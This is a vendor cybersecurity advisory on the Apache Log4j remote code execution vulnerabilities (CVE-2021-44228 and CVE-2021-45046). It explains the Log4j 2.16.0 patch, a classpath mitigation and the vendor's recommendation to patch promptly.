Cybersecurity Threat Advisory 0083-21: Second Log4j Vulnerability Patch Released
Over this past week, several organizations are releasing security updates to address the Apache Log4j zero-day vulnerability being exploited in the wild. Although Apache released an initial patch for the exploit, it was deemed incomplete due to a lack of security for non-default configurations. In response, Apache has released a second patch, Log4j 2.16.0, which is designed to mitigate the vulnerability entirely.
Technical Detail & Additional Information
WHAT IS THE THREAT?
As we know, a significant Log4j Remote Code Execution (RCE) vulnerability has had a patch released and tracked as CVE-2021-44228. However, the patch was not entirely effective at mitigating the risk due to CVE-2021-45046, the lack of completion in some non-default configurations. The latest patch, Log4j 2.16.0, removes support for message lookup patterns and disables JNDI functionality by default all together. While CVE-2021-44228 simply disabled the ability to control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. Furthermore, for prior releases (<2.16.0) this issue can also be mitigated by removing the JndiLookup class from the classpath.
WHY IS IT NOTEWORTHY?
Log4j is practically omnipresent in the world of websites and all things Java. It was used to log information for the web applications developers created in efforts to aid with debugging and for other tracking purposes. LDAP, RMI and other JNDI endpoints can be used as avenues to execute arbitrary code from a threat actor utilizing the Log4j vulnerability. Many malicious actors and threat groups are using this vulnerability to gain unauthorized access. Many believe due to the magnitude of the vulnerability the detections confirmed will continue to grow and mitigation will be a slower than usual process. Furthermore, NIST has given this vulnerability a base score of 10, ten being most critical.
WHAT ARE THE RECOMMENDATIONS?
Barracuda MSP has implemented custom rules to detect this exploit in its SKOUT Managed XDR Log and Network Security Monitoring solutions and recommends applying this patch immediately to protect your organization.
Additionally, it is up to certain vendors to apply this patch to their applications, so keep an eye out for any application updates. This resource is tracking vulnerable components/applications: https://github.com/YfryTchsGD/Log4jAttackSurface
For more in-depth information about the recommendations, please visit the following links:
If you have any questions, please contact our Security Operations Center.